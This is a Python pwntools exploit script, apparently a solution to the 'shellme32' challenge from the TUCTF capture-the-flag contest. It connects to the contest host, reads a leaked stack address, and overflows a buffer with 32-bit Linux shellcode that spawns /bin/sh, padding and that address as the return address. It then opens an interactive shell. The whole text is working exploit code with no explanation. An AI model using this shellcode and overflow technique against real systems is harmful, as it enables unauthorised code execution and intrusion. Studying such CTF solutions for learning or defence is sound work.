```python
from pwn import *
context.log_level = "DEBUG"

#s = process('shellme32')
s = remote("chal.tuctf.com",30506)
limit = 40
print(s.recvline())
leak = s.recvline()
leak = str(leak.decode()).replace("\n","")
addr_leak = int(leak, 16)
print(hex(addr_leak))
shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
payload = shell_code
payload += str("A" * (limit - len(shell_code))).encode()
payload += p32(addr_leak)
s.sendline(payload)
s.interactive(prompt="")
```